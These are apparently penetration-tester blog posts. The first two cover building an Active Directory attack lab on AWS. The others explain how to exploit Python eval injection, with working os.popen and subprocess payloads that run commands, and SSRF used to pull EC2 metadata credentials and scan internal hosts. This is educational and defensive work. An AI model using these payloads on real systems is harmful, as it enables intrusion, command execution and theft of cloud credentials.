Thursday, May 4, 2017

Pentest Home Lab - 0x1 - Building Your AD Lab on AWS

In Pentest Home Lab - 0x0 - Building a virtual corporate domain, we talked about why you would want to build your own AD pentest lab, where you can build it (cloud vs on-premises options), and the pros and cons of each option.

This post covers building your lab on AWS. Even if you have a lab at home, setting up a small second home lab on AWS is a worthwhile exercise. You'll learn a lot about AWS in the process.

Table of Contents

  • What are we going to build?
  • Creating your AWS instances
    • Instance #1: This will be the Domain Controller
    • Instance #2: This will be Workstation01 
      • Disable IE Enhanced Security Configuration
    • Instances #3 & #4 (Optional)
    • Create security groups so that your LAN hosts can talk to each other
  • Creating the Domain
    • Setting up WindowsServer2016-1 to be a Domain Controller
      • Configure a static IP (Required)
      • Change the hostname (Optional)
      • Promote the server to a Domain Controller
    • You now have an Active Directory Domain - Add some users
    • Add at least one admin user to your domain admins group
    • The Homestretch - Add all hosts to the domain
      • Configure DNS
      • Add hosts to the domain
      • Add domain users to the remote desktop group

What are we going to build?

At the end of this post, you will have a fully functional AD environment in AWS that you can use to make yourself a better penetration tester.  I'm not going to assume you are familiar with AWS or setting up Active Directory, so some of this might be review.  

You will configure 2-4 AWS EC2 instances:

You will create a Windows 2016 domain, promote one server to be a DC, and add additional hosts to the domain:

You will create at least 2 users and 1 administrator account:

To get started, you really only need a Domain Controller and a Workstation. To be able to test out more stuff, you'll probably end up wanting at least two workstations (User 1's workstation and User 2's workstation), and at least one more non DC server. 

Note: If you missed my last post, I mentioned that AWS does not provide an AMI (AMIs are like images) for Windows 7/8/10.  I also mentioned that while not a true replica of what we run into on the job, I have found that you can just treat servers as if they were clients, and it is good enough.  In other words, you have everything you need to simulate a compromised victim's workstation for the purposes of our testing with Windows Server 2012/2016. So for our AWS lab, our workstations will just be additional Windows 2016 servers.

One last thing.  To understand/estimate what your AWS lab will cost you, check out the AWS Math section in my last post: Pentest Home Lab - 0x0 - Building a virtual corporate domain.

To summarize:

  • EC2: You pay for EC2 instances only for the hours that the instance is running
  • EBS: You pay for EBS volumes from the time they are provisioned to the time they are removed.  This means that even if you don't use your lab for the entire month, you will still get charged for the provisioned EBS space. 

Some numbers:

  • 2 Windows instances, 1 Kali instance, used 30 hours/month on average
    • Monthly EC2 Cost: $1.38/month
    • Monthly EBS Cost: $8/month
    • Monthly Total: $9.38/month
    • Annual Total: $112
  • 4 Windows instances, 1 Kali instance, used 30 hours/month on average
    • Monthly EC2 Cost: $2.36
    • Monthly EBS Cost: $14
    • Monthly Total: $16.36
    • Annual Total: $196

Creating your AWS instances

Instance #1: This will be the Domain Controller

1) If you have not already, Create an AWS account 

2) Once your account is created, log into the AWS Console

3) Once you log in, under Compute, click EC2

4) Under Create Instance, click Launch Instance 

5) Find Microsoft Windows Server 2016 Base and click Select 

6) Pick t2.micro (or any other size)

7) Click Next: Configure Instance Details

8) Accept defaults and click Next: Add Storage (Or if you are more familiar with AWS, feel free to create a new VPC or a new subnet for this lab) 

9) Accept defaults and click Next: Add Tags

10) Accept defaults and click Next: Configure Security Group 

Time to configure your security group. If you are unfamiliar with security groups, but familiar with traditional firewalls, think about it like this: A security group is like a firewall rule and you apply as many rules as you want to each AWS instance. The combination of applied rules is kind of like your per instance firewall policy.

For your lab, I suggest you limit RDP access to your public ISP assigned address (if you are doing this at work, I suggest using a VPN to connect to your lab). The cool thing is that if this changes, you can just log into the AWS console from anywhere and change the IP in the security group. 

11) Click Review and Launch, then Launch 

12) If you haven't created an AWS keypair yet, create one. If you have, you know what to do here. 

13) Launch Instance 

14) Let's go see our new instance.  Go to Services > EC2 

15) You will now see a new running instance. Click the Running Instances link 

16) Your new instance will say Initializing under Status Checks. It is a good idea to rename it. 

17) While it finishes initializing, find the instance's public IP. You can find it to the right under IPv4 public IP, or in the lower frame, in the description tab, under IPv4 Public IP

18) Select your instance and click Connect 

19) Download the RDP file, and point the window to your private key so you can decrypt the random password AWS gave your Windows instance. Once you decrypt that password, save it somewhere safe, like in a password vault (i.e., Keypass, PasswordSafe).

20) Double click the AWS RDP file, or just put the public IP in RDP manually and choose Administrator as the username 

21) Enter the decrypted password

22) You are now logged into your first server. 

Instance #2: This will be Workstation01 

There is a really cool feature within the EC2 console called "Launch More Like This". This launches the EC2 instance wizard and uses the same EC2 settings as the selected instance, such as security groups, sizing preferences, desired subnet, etc. But, this is NOT like cloning a VM. Everything inside the container is going to be vanilla.

1) Go back to EC2 dashboard 

2) Click on Windows Server 2016-1 and click Actions, Launch more like this

3) Click Launch 

4) Select same keypair you created last time, and click Launch Instances 
5) When it is fully running, download the RDP file again and decrypt the password

6) Double click the AWS RDP file, or just put the public IP in RDP manually and choose Administrator as the username 

7) Enter the decrypted password

8) You are now logged into your second machine

Disable IE Enhanced Security Configuration

This will make IE act more like Windows10, specifically it will not require you to add every new site to the Trusted Sites list.  
1) Open Server Manager

2) Click Local Server

3) In Properties, navigate to IE Enhanced Security Configuration, and click On

4) Change both options to Off, and click OK

5) Restart IE

Instances #3 & #4?

You can either stop here and you'll have:

WindowsServer2016-1 - This will be your DC
WindowsServer2016-2 - This will be your workstation

Or, you can make two more servers and you will have: 

WindowsServer2016-1 - This will be your DC
WindowsServer2016-2 - This will be user 1's workstation
WindowsServer2016-3 - This will be server1
WindowsServer2016-4 - This will be user 2's workstation

Create security groups so your LAN can talk to each other

Now that we have spun up all of our servers and have successfully RDP'd to each of them, there is one more thing we need to do before we can create our domain. We need to create an AWS Security Group that allows the hosts on your subnet to talk to each other. 
1) On the left navigation bar under Network & Security, select Security Groups, Click Create Security Group

2) Name it, allow all traffic inbound from your subnet. You can leave the outbound tab as is. The default is to allow all outbound traffic.  

3) Click Create

4) Now we need to apply this security group to all of our Lab instances

5) Go to the EC2 view, click Actions, navigate to Networking, and select Change Security Groups

6) Select the new security group *in addition* to the RDP security group you already have selected

7) Click Assign Security Groups

8) Repeat this for ALL Lab instances

Creating the Domain

Setting up WindowsServer2016-1 to be a Domain Controller

There are a few things you'll need to do and some you might want to do before creating your domain and promoting your first server to a domain controller.  

Configure a Static IP (Required)

The first thing you want to do is change your private IP from dynamic to static. The private IP address that AWS gives your instance "remains associated with the network interface when the instance is stopped and restarted, and is released when the instance is terminated."  So while this address will not change, it is still dynamic as far as your instance is concerned, and will not pass a "promotion to DC" prerequisite check in Server 2016.  There might be a better way to do this, but for me, all I did was configure the instance with a static address and I used the AWS assigned dynamic address as the IP address.   

1) If you are new to Server 2012/2016, you get to this by right clicking on the networking icon at the bottom left and click Open Network and Sharing Center

2) Click the Ethernet adapter

3) Use Powershell to find the current IP, netmask, and gateway. Set the static configuration to match.

Change the Hostname (Optional)

The next thing you might want to do, and this is optional, is to change the hostname to something like AWS-DC01. 

1) If you are new to Server 2012/2016, click the folder icon in the task bar, right click This PC, and click properties

2) The rest should be familiar:

3) You will have to reboot at this point. Give it a few minutes and log back in.  

Promote the server to a Domain Controller

Now let's finally make it a DC. 

1) Open Server Manager 

2) Click Manage, Add Roles and Features 

3) Next, Next, Next 

4) Select Active Directory Domain Services, then click Add Features 

5) Select DNS Server, then click Add Features 

6) Next, Next, Next, Install, Close 

7) In Server Manager, click the yellow triangle and click Promote this server to a domain controller

8) In the wizard, select Add new forest, and give it a root domain name: aws.local 

9) Give it a restore password and drop that in your password manager

10) Next, Next, Next, Next, Next, Install 

11) When it is done, click close (or just wait and it will reboot) 

12) Give it a minute and connect back. Once you connect, it will take a few minutes to fully install. 

You now have an Active Directory Domain - Add some users

I'm going to walk you through adding a bunch of users, and how to make one of those users a domain administrator.   I am not going to cover setting up OU's in this post. If you are interested doing that now, take a look at this awesome post from Jared Haight: Setting up an Active Directory Lab - Part 3

1) Within server manager, click tools at the top right and select active directory users and computers

2) Double click on your domain to expand it (either on the left or the right frame)

3) Right click on users and add New > User

4) Name your users however you want, but I like to keep it simple:
  • First: User
  • Last: 1
  • Login name: user1
  • Click Next
  • Enter an easy to crack password
  • Uncheck user must change at next login
  • Check password never expires
  • Next
  • Finish
5) Repeat for user2 and admin1

Add at least one admin user to your domain admins group

1) Within Active Directory Users and Computers, Double click Domain Admins

2) Click Members

3) Click Add

4) Start typing a username of your admin user and click check names

5) Click OK, OK

The Homestretch - Add all hosts to the domain

Configure DNS

To add a machine to the domain, the one thing you NEED to do is set the domain controller as the primary DNS server.  

1) RDP to server

2) Right click on the networking icon at the bottom left and click Open Network and Sharing Center

3) Select Ethernet Adapter

4) Change the primary DNS server to be the IP address of your DC

Add host to the domain

While this process is fairly straightforward, I feel like it never works the first time for me.  If you run into issues, read the notes right after these steps for ideas.

1) Select the folder icon in the task bar

2) Right click This PC

3) Click Properties

4) Under Computer name, domain, and workgroup settings, click Change settings

5) Click Change

6) Give your machine a better hostname: Workstation01 

7) Switch from Workgroup to Domain and specify the domain. For example, aws.local

8) Click OK

9) Enter Domain Admin credentials. Go ahead and use Admin1's credentials.

10) Once your machine has been added, click OK twice

11) Close the window, and go ahead and Restart Now

12) Repeat this for all servers

Having trouble adding your host to the domain?  Here are some troubleshooting tips:

1) Can you ping the IP address of your DC from your other server(s)?
2) Can you resolve the hostname of your DC from your other server(s)?
3) Can you navigate to \\IP_ADDRESS_OF_DC from your other server(s)?

Here are things to look for:

AWS Security Groups - Make sure you didn't mess up your security group.
--- Did you choose All TCP instead of All traffic?
--- Did you use the wrong subnet mask for your source (or use the wrong subnet altogether)?
Network Config Settings
--- Did you give your DC the right subnet mask when you configured the static IP?
--- Did you configure the primary DNS server properly on your non-DC host?
Are you typing in the right domain name when attempting to add your host?

Add domain users to the remote desktop group

1) Select the folder icon in the task bar

2) Right click This PC

3) Click Properties

4) On the left, click Remote Settings, and enter the domain administrator credentials

5) In the Remote Desktop section of the window, click Select Users...

6) Click Add...

7) Type Domain users  and click Check Names

8) Click OK, OK, OK

You should now be able to RDP to this host with any of your domain users (User1, User2, Admin1)


You did it!  You should have 1 DC, and 1-3 additional hosts set up in AWS. You are now ready to try all sorts of stuff, like Empire, Metasploit, Mimikatz, Kerberoasting, and more.

Feedback, suggestions, corrections, and questions are welcome!

Pentest Home Lab - 0x0 - Building a virtual corporate domain

Whether you are a professional penetration tester or want to be become one, having a lab environment that includes a full Active Directory domain is really helpful. There have been many times where in order to learn a new skill, technique, exploit, or tool, I've had to first set it up in an AD lab environment.

Reading about attacks and understanding them at a high level is one thing, but I often have a hard time really wrapping my head around something until I've done it myself.  Take Kerberoasting for example: Between Tim's talk a few years back,  Rob's posts, and Will's post, I knew what was happening at a high level, but I didn't want to try out an attack I'd never done before in the middle of an engagement. But before I could try it out for myself, I had to first figure out how to create an SPN. So off to Google I went, and then off to the lab:

  • I set up MSSQL on a domain connected server in my home lab
  • I created a new user in my AD
  • I created a SPN using setspn, pairing the new user to the MSSQL instance
  • I used Empire to grab the SPN hash as an unprivileged domain user (So cool!!)
  • I sent the SPN hash to the password cracker and got the weak password     
THAT was a fun night!

So back to the goal of this blog series. I'll share what I've learned while building my own lab(s), I'll share some of the things I've done in my lab to try and improve my skills, and for every attack I cover, I'll also cover how to set up your lab environment.

Selecting Your Virtualization Stack

QUESTION: Should I build this in the cloud or on premises?

Before we can get to any of the hacking, we need to talk about where you are going to install your virtual environment.  In fact, your home lab doesn't even need to be located within your home. I'll give an overview of each option, but the decision will likely be influenced by what hardware you having lying around, how much you want to spend up front, and how much you will be using your lab. In the end, you might even want to try more than one option, as they all have distinct benefits.

Cloud Based

Often, building a home lab using dedicated hardware is cost prohibitive. In addition to hardware costs, if you add windows licensing costs, a traditional home lab can get really expensive. The good news is these days you don't need to buy any hardware or software (OS). You can build your lab using AWS, Azure, Google, etc. In addition to not having to purchase hardware, another major advantage of building your lab in the cloud is that the Windows licensing costs are built into your hourly rate (at least for AWS -- I'm not as familiar with Azure or Google). 


  • Hardware
    • No hardware purchases
  • OS Licensing
    • No Windows OS software purchases
    • No expiring Windows eval licenses
  • Hourly Pricing
    • You only pay for the time you use the lab machines
  • Education
    • You will learn a lot about the cloud stack you are building on

  • Cost
    • Leaving your instances running gets pretty expensive. Four windows servers (t2.micro) running 24/7 will put you at around 45 bucks a month
  • Keeping track of instances
    • If you don't want them running all the time, you will have to remember to shut down instances when not in use or configure CloudWatch to do that for you
  • You can't pause instances
    • In AWS at least, you can't pause VMs like you can with virtualization software.  This is pretty annoying if you are used to pausing your VM's at the end of each session and picking up where you left off
  • Limited Windows OS Support
    • No Windows 7/8/10 images (might be AWS specific)
  • Some testing activities need to be approved
    • You'll have to notify the cloud provider if you want to attack your instances from outside your virtual private cloud (VPC)

AWS Math

AWS can be reasonable for home use, or it can get very expensive, depending on how you use it. The key here is to think about how much you will be using your lab.  If you think you will play in your lab around 3 hours a night about 10 nights a month, AWS makes a lot of sense. If you are going to be running your hosts permanently, it will probably be more cost effective to run your lab on premises.

Here are some cost estimations using AWS's cost estimator:

Update (5/8/2017):  I previously did not include EBS volume costs in the tables below. I've updated the tables to include EBS volume costs (30GB for each windows volume, 20GB for Kali).  You are charged for provisioned EBS volumes whether the instance is running or stopped.

2 Windows instances, 1 Kali instance

Annual cost if you use your lab 30 hours a month on average: $112/year.

4 Windows instances, 1 Kali instance

Annual cost if you use your lab 30 hours a month on average: $196/year

These are just estimations.   You can save money by choosing a smaller volume size at instance creation, keeping your Kali instance local, and by tearing down and rebuilding some or part of the environment if you feel like you don't need it for a few months.

Also, as you can see, the difference in EC2 costs is pretty extreme if you leave your instances running all the time. Remember to turn off those instances when not in use!

One caveat with building your lab entirely in the cloud, at least with AWS, is that AWS does not offer an AMI for Windows 7/8/10. While it appears possible to use your own Windows7/8/10 image, now you are back to either using eval licenses or paying for them. While doing research for this blog series, I came across something called AWS workspaces, and even that does not use 7/8/10. It simulates a desktop environment using Microsoft's Desktop Experience via Windows Server 2012. 

After playing around with Amazon Workspaces, I realized it is not the best option for a pentest lab due to monthly costs ($7 per month per workstation), but I did learn you don't really NEED Windows 7/8/10 in your pentest home lab to do most of what we will want to do, which was a good lesson.

In an upcoming post, I will write in detail about Building your AD lab on AWS.

On Premises

If you are going to build the lab on your own hardware, the next decision you need to make is: Do I use dedicated hardware and a hypervisor, or do I run software that sits on top of my host OS like VMware Workstaion Pro, Workstation Player, VMware Fusion (Mac), or Virtualbox?

Using your Desktop/Laptop

If you have a desktop/laptop that has plenty of resources to spare, there is no reason you can't set this entire environment up on your OS of choice using either VMware or VirtualBox. On my laptop, I use VMware Workstation and have a test domain with 1 domain controller, 1 additional Windows server, and 1 Windows7 host. With a 1TB HDD and 16GB of RAM, I can run all three if I need to, and Kali at the same time. If you can swing 32GB and a bigger SSD, that would give you even more flexibility. As I mentioned in the cons above, you might be limited. My current laptop can't take more than 16GB.


  • Mobility
    • Take your lab with you wherever you go (if you have a laptop)
  • Easy entry
    • You probably already have a Desktop/Laptop that you can use
  • Free Options
    • VirtualBox and VMware Workstation Player are free


  • Cost
    • VMware Workstation Pro (windows) and VMware Fusion (mac) are not free
  • Hardware Limitations 
    • Your current desktop/laptop might be limited in how much memory you can add to it
  • Shared Resourcing
    • You are competing for shared resources on your host OS. This might not be acceptable
    • Every time you need to reboot your host OS, you have to stop/pause all of your VMs

Using a Hypervisor

Most penetration testers that I know still keep it traditional and use dedicated hardware combined with a Hypervisor for their home lab. There are plenty of great articles that talk about hardware requirements and options. I have friends who prefer to go the route of buying old enterprise software on ebay, but I have always just used consumer hardware.  Either way, between the RAM and fast disks, it can get expensive. On my server, I have an AMD 8 core chip circa 2015, and I just upgraded from 16 to 32GB of RAM, and from a 512 SSD to a 1TB SSD.  If you can afford it, avoid the mistake I made and just go right to 32RAM and a 1TB SSD. That will give you more than enough room to grow your lab, make templates, take lots of snapshots, etc.


  • Flexibility
    • With dedicated hardware, you can isolate the lab on it's own network, VLAN, etc. 
  • Software cost
    • There are plenty of free options when it comes to Hypervisors
  • Options
    • You can take advantage of things like KVM, containers, and thin provisioning  
  • Portability
    • If you use something small like an Intel NUC, your lab can be portable


  • Energy Inefficient
    • The last thing anyone who reads this post needs is yet another computer running 24/7 ;)
  • Cost
    • Unless you have something laying around already, you'll have to buy new hardware
  • Vendor Specific Knowledge
    • Do you have the time and desire to learn all of the hypervisor specific troubleshooting commands when something breaks?  

Great Home Lab Resources

Home Lab Design by Carlos Perez
My new home lab setup by Carlos Perez
Building an Effective Active Directory Lab Environment for Testing by Sean Metcalf
Intel NUC Super Server by Mubix

Over the years I've played with a few of the popular Hypervisors, and here are my thoughts:

Vmware ESXi - My first lab was ESXi. If you've never used it, I recommend using this as your Hypervisor if for no other reason than it is ubiquitous in the enterprise. You will find ESX on every internal pentest, and having experience with it from your home lab will help you one day.

Citrix Xen - Eventually my ESX hard drive failed. After reading this post by Mubix, when I rebuilt, I tried Citrix's Xen Server. I liked Xen, but I quickly ran out of space on my 512G SSD, and when I added a second drive it started to freak out.  The amount of custom Xen commands I had to learn was getting out of control, and I didn't feel like the experience was going to help me all that much so I pulled the plug and looked for something new.

Proxmox VE - For my third iteration, I'm using Proxmox VE, after my friend @mikehacksthings gave a presentation on it at a recent @IthacaSec meeting. I really like it! Thin provisioning means it uses a lot less resources, and it seems lightning fast compared to ESXi and Xen. It definitely has my stamp of approval so far.

In an upcoming post, I'm going to write in detail about building your AD lab on premises using Proxmox.

Getting Windows Server Software

If you are going to build your lab in the cloud, you can just relax and skip this section. If you are going to build on premises, you will need to get your hands on the following software:
  • Required - Windows Server (2012 or 2016)
  • Optional - Windows 7 (or 8 or 10)   
In terms of getting the software, there are a few options: 
  1. Download evaluation versions, which are good for 180 days.
  2. See if your workplace has a key/iso that can be used in a lab environment.
  3. Go with a cloud solution like AWS or Azure where the licensing costs are built into your hourly rate.
  4. I think if you are a student you can get the OS's for free.
For more detail on these options, check out Sean Metcalf''s blog post: Building an Effective Active Directory Lab Environment for Testing. You will also notice that Sean gives some really useful breakdowns of what he feels you need in an AD lab.  I'm going to keep this series more basic than that, but I encourage you to read his post.

Let's create a Domain

Once you have selected your virtualization stack, it is time to configure it. The following two posts take you through setting up two AD Lab environments. One in the cloud using AWS, and another on premises using Proxmox VE.

Pentest Home Lab - 0x1 - Building Your AD Lab on AWS
Pentest Home Lab - 0x2 - Building Your AD Lab on Premises (Coming Soon)


Feedback, suggestions, corrections, and questions are welcome!

Wednesday, November 9, 2016

Exploiting Python Code Injection in Web Applications

A web application vulnerable to Python code injection allows you to send Python code though the application to the Python interpreter on the target server. If you can execute python, you can likely call operating system commands. If you can run operating system commands, you can read/write files that you have access to, and potentially even launch a remote interactive shell (e.g., nc, Metasploit, Empire).

The thing is, when I needed to exploit this on an external penetration test recently, I had a hard time finding information online about how to move from proof of concept (POC) to useful web application exploitation. Together with my colleague Charlie Worrell (@decidedlygray), we were able to turn the Burp POC (sleep for 20 seconds) into a non interactive shell, which is what this post covers.

Python code injection is a subset of server-side code injection, as this vulnerability can occur in many other languages (e.g., Perl and Ruby). In fact, for those of you who are CWE fans like I am, these two CWEs are right on point:

CWE-94: Improper Control of Generation of Code ('Code Injection')
CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')


If you (or Burp or another tool) finds a python injection with a payload like this:

eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))

You can use the following payload to go from a time based POC to OS command injection:

eval(compile("""for x in range(1):\\n import os\\n os.popen(r'COMMAND').read()""",'','single'))

And as it turns out, you don't even need the for loop. You can use the global __import__ function:


Better yet, now that we have import and popen as one expression, in most cases, you don't even need to use compile at all:


To pass these to the web application, you will have to URL encode some characters. The examples from above are each encoded below to illustrate what they might look like in action:

  • param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29
The rest of the post will dig into the details, share an intentionally vulnerable web app, and at the end of the post I'll demo a tool that Charlie and I wrote that really speeds up exploitation of this vulnerability -- kind of like what sqlmap does for SQLi, but in the infancy stage.

Setting up a Vulnerable Server

I created an intentionally vulnerable application for the purpose of this post, so if you want to exploit this in your lab, you can grab it here. To get it to work, you have to install via pip or easy_install, but that is it. It can run as a stand alone server, or it can be loaded up into Apache with mod_wsgi.

git clone
cd VulnApp

The Vulnerability

Although you would be hard pressed to find an article online that talks about python eval() without warning that it is unsafe, eval() is the most likely culprit here.  When you have the following two conditions, the vulnerability exists: 
  1. Application accepts user input (e.g., GET/POST param, cookie value)
  2. Application passes that user controlled input to eval in an unsafe way (without sanitization or other protection mechanisms). 
Here is a simplified version of what the vulnerable code could look like:

That said, eval() is only one of the potential culprits here.  A developer can also introduce this vulnerability by unpickling serialized data passed by the user.

Python's exec() is another way you can make your app vulnerable, but as far as I can tell, a developer would have to try even harder to find a reason to exec() web based user input.  That said, I'm sure it happens.

Automated Discovery 

Having a scanner find something I haven't seen before, and then doing the research to move from vanilla POC to something report worthy has been one of the pillars of my offensive security education (along with learning how to find things that scanners can not find). This vulnerability is no different. If you find this in the wild, you will most likely find it with an automated tool, like Burp Suite Pro. In fact, the check Burp uses is something they developed internally, so I'm not sure you would even find this vulnerability without Burp Suite Pro at this point.    

Once you have the vulnerable demo app up and running, you should be able to find the vulnerability with a Burp Suite Pro scan: 

Here are the details showing the payload that Burp used to find this vulnerability:

The reason Burp flags the app as vulnerable, is that after it sent this payload, which told the interpreter to sleep for 20 seconds, the response took 20 seconds to come back. As with any time based vulnerability check, every once in a while there are false positives, usually because the app in general starts responding slowly.

Moving from POC to Targeted Exploitation

While time.sleep is a nice way to confirm the vulnerability, we want to execute OS commands AND receive the output.  To do that, we were successful with os.popen() or subprocess.Popen(), and subprocess.check_output(), and I'm sure there are others.

The Burp Suite Pro payload uses a clever hack (using compile) that is required if you have multiple statements, as eval can only evaluate expressions. There is another way to accomplish this, using global functions (ex: __import__), which is explained here and here.

This payload should work in most cases:

# Example with one expression

# Example with multiple expressions, separated by commas

If you need to execute a statement, or multiple statements, you will have to use eval/compile:

# Examples with one expression

  • eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))
  • eval(compile("""__import__('subprocess').check_output(r'COMMAND',shell=True)""",'','single'))
#Examples with multiple statements, separated by semicolons

  • eval(compile("""__import__('os').popen(r'COMMAND').read();import time;time.sleep(2)""",'','single'))
  • eval(compile("""__import__('subprocess').check_output(r'COMMAND',shell=True);import time;time.sleep(2)""",'','single'))

In my testing, some things just did not work with the global __import__ trick above, like using subprocess.Popen.  In that case, just stick with the for loop technique that the Burp team came up with:

  • eval(compile("""for x in range(1):\n import os\n os.popen(r'COMMAND').read()""",'','single'))
  • eval(compile("""for x in range(1):\n import subprocess\n subprocess.Popen(r'COMMAND',shell=True, stdout=subprocess.PIPE)""",'','single'))
  • eval(compile("""for x in range(1):\n import subprocess\n subprocess.check_output(r'COMMAND',shell=True)""",'','single'))

If your vulnerable parameter is a GET parameter, you can exploit this easily with just your browser: 

Note: The browsers do most of the required URL encoding for you, but you will have to manually encode semicolon (%3b) and spaces (%20) if they are used, or use the tool we developed which is covered below.

If you are working with a POST parameter (or a cookie value which was the case on my pentest), you'll probably want to use Burp Repeater or something similar. This next series of screenshots shows me using subprocess.check_output() to call pwd, ls -al, whoami, and ping, all in one expression:

So manually URL encoding characters gets old fast, so you will probably find yourself wanting to whip up a python script to send the requests from the command line like Charlie and I did.  Or, if you'd like, you can use ours.

Exploitation Demonstration with PyCodeInjectionShell

You can download PyCodeInjectionShell, and read up on how to use it here: PyCodeInjectionShell it is written to feel like sqlmap as much as possible. Our assumption is that anyone who needs to use this tool is probably very familiar with sqlmap.

Here is what it looks like in action, accepting a URL. Note the sqlmap style * designating the payload placement in the URL. This example also uses interactive mode, which lets you continuously enter new commands until you exit:

And here is the same functionality using a request file copy/pasted from burp repeater, with an implanted *, which tells the tool where to inject:

In either example, if you just want to enter one command and exit, just remove the -i.

Feedback, suggestions, questions and bug reports are welcome!

Wednesday, December 23, 2015

Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)

I recently came across a Server Side Request Forgery (SSRF) vulnerability within an application that I assessed.  The application was hosted on Amazon EC2 and was using Node.js, Express.js, and as I found out later, Needle.js.



Manual Discovery

In the discovery phase, I noticed a function of the application that was taking a user specified URL and displaying the first paragraph from that URL into the page.  This application allowed a user to share a URL with their friends, and grabbing the first paragraph was a feature that would provide the friends with more context.

The thing is, when looking at my Burp history, I could not find the request to the URL that I specified in my logs.  This should raise an eyebrow!  This means that the server is taking the URL I specified, making a request on my behalf, and then returning the result to me. That right there is SSRF.  Then, the only question was: What is the risk?

Automated Discovery

Since April 2015, if you are using the Burp Collaborator (and you definitely should be), you should be able to detect SSRF if you send the vulnerable request to the active scanner.  The following image shows a few different ways Burp Collaborator can identify SSRF (as Out-of-band resource load and External service interaction).


Exploitation Demonstration

I wanted to demonstrate this SSRF vulnerability without sharing any details about the assessed application. To do this, I re-created the vulnerability by somehow hacking together my first Node.js application (and it actually worked).


My application, which for this demo is hosted on an Amazon EC2 micro instance, runs Node.js, and uses Express.js and Needle.js (which is what makes the SSRF request).

Just as the real application did, my demo application takes a URL specified by the user, and makes a request using Needle.js. The real application accepted the user supplied URL from a JSON parameter in the BODY, however my Node skills are not there yet, so for my demo the URL is sent via a GET parameter.

This is the most pertinent part of the vulnerable app:

This is what it looks like in action:

It looks just like an iframe, doesn't it?   But if it were a typical iframe, your browser would be making the request to, and the application would not be vulnerable to SSRF.

However, when I ask the vulnerable server to make a request to, a site that shows the IP Address and User Agent of the requester, I can confirm the SSRF pretty clearly:

The two most interesting items are the source IP and the User_Agent.  This response from proves that the request was sent by the EC2 instance, specifically from Needle, a Node.js HTTP client.

Who cares? What is the risk?  

Well, as mentioned above and discovered by many excellent researchers, if you can get the server to make a request for you, you can often gain access to things you otherwise would not have the ability to access.

Accessing the Amazon EC2 Metadata Service

For example, if your application is running on an Amazon EC2 instance, you can query the instance metadata service at (a non-routable address).  This service is ONLY accessible via the instance itself, so without SSRF, command injection, or something similar, you would never be able to reach this service.

This is just one example of a metadata object.  Erik Peterson (@silvexis) covers much more sensitive things that can potentially live in the metadata service in his excellent talk Bringing a Machete to the Amazon. For example, this next request allows an attacker to retrieve the temporary security credentials for the "admins" role, which would allow an attacker to control access to your AWS resources.

Accessing the Amazon EC2 User Data Object

Another place you will want to look is the user-data container, located at:  Amazon gives the following warning to devs:

But as we all know, if it is easier to store some passwords or other sensitive data in user-data, some people will, which is why you should check.  This is what that request looks like from my vulnerable EC2 instance:

For a complete list of what to look for if you have access to the EC2 metadata service, check out this document from Amazon: Instance Metadata and User Data.

Scanning and Accessing the Back End Infrastructure

In addition to checking the metadata service (and also looking for user data), you should try to exploit SSRF to look for services, hosts, and resources that are accessible via the vulnerable server, but not accessible to you directly. Burp Intruder is a great tool to accomplish each of these tasks.


Demo Setup

To set up for the demo, I am using a second EC2 instance running Kali, with an internal IP address of and listening on port 8080.  The web service on this host is not accessible from the Internet. In fact, the only connections allowed to are from the internal IP address of the server that is vulnerable to SSRF, and only on port 8080/tcp.

Here is is the EC2 security policy for (Kali running apache):

Scanning for ports (XSPA)

1) Make the initial request through Burp. In this example, I just attempted to access TCP port 1.

2) Send the initial request to Burp Intruder.

3) Set the payload position (to the port).

4) Set the payload itself. For the demo, I am selecting 11 sequential ports, but you could easily paste in the top X tcp ports from nmap or a list of common web server ports.

5) Start the attack.  As you can see from the screenshot below, there are a few potential ways to infer which port is open and which ports are closed.  In this case, you can use the response code OR the length of the response:

Alright! I just determined that is listening on port 8080, and that it is running a web server.


Scanning for hosts

This follows the exact same steps as above, but instead of setting the port as the payload position, you would set the IP address range you want to scan, so that you are scanning a range of IP addresses for a particular port, like port 80/tcp or 443/tcp.

It would look like this:

I did not want to actually scan other EC2 IPs, so I'm just leaving this example here.  But, basically, you pick back up again at step 4 and everything else is the same as above.

You could also use the Cluster Bomb attack type in Burp and scan for ports and services at the same time.


Scanning the internal web server

Next, I'll show how we can once again repeat the process described above, but this time we'll scan for files and/or directories on a server, rather than scanning ports or hosts.

As this is my demo, I know the target file is located at users.txt, but I threw a few other pages into Burp Intruder to show what this would look like.   In a real world scenario, you would want to use a source of directories and file names from a resource like fuzzdb.

Just like in the previous examples, you can find a match by looking for a difference.  In this example, everything gives you a 200 status, but the length of users.txt is shorter than all of the others. This is your first clue that you found a file that exists.

As with the ports and services example from above, you could also use the Cluster Bomb attack type in Burp to scan multiple web servers you have identified with the same file/directory list, all at the same time.


Rather than proxying requests on behalf of users, the application should have the user’s browser retrieve the desired information. If it is necessary to proxy the request, a white list should be used on the server side and the User-Agent information should be stripped or modified.

Additional Resources 

There are several great SSRF resources out there. In my opinion, Nicolas GrĂ©goire (@Agarri_FR) is the master of SSRF (and XXE), so if you have not read up on  much about either, you need to check out some of his blog posts and talks.

One of my favorite talks: Nicolas GrĂ©goire - Hunting for Top Bounties
One of my favorite blog posts: Compromising an unreachable Solr server with CVE-2013-6397

I decided to blog about this because I just submitted a SSRF finding as a pull request to Mubix's Common Findings Database Project (CFDB). That finding has some of the same content I included here. In the CFDB finding, I include a bunch of links to prior work as well as some useful resources. 

I think CFDB is a great project, and sorely needed at this point in our industry.  I urge anyone who can contribute to do so.   

Final Thoughts

Unlike client side vulnerabilities like XSS and CSRF, SSRF can potentially give you access to back end infrastructure that you would not otherwise have access to. Keep an eye out for it, and if you do find it, remember to demonstrate the risk.

Did I miss the mark on anything? Was I inaccurate? Was this post helpful to you? Feedback is welcome and encouraged!